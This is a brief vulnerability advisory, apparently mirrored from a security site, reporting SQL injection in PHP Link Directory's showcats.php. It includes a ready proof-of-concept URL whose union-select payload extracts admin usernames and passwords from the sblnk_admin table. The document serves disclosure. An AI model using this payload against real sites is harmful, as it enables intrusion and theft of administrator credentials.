PHP Link Directory SQL injection vulnerability-vulnerability warning-the black bar safety net

2011-01-29T00:00:00
ID MYHACK58:62201128962
Type myhack58
Reporter 佚名
Modified 2011-01-29T00:00:00

Description

PHP Link Directory is a popular Internet classified directory systems, PHP Link Directory showcats. php file existsSQL injectionvulnerabilities that could lead to sensitive information disclosure.

[+]info: ~~~~~~~~~ [|]Author: BorN To K! LL - h4ck3r [|]Contact: SQL@hotmail.co.uk == [|]Script: PHP link Directory software [|]Version: n/a [|]Link: http://www.softbizsolutions.com/php-link-directory-software.php

[+]poc: ~~~~~~~~~ [path]/showcats. php? sbcat_id=[SQL-Injection] [|]3xample: [path]/showcats. php? sbcat_id=-9999+union+all+select+1,concat(username,0x3a,password),3,4+from+sblnk_admin--

[+]Reference: ~~~~~~~~~ http://www.exploit-db.com/exploits/16061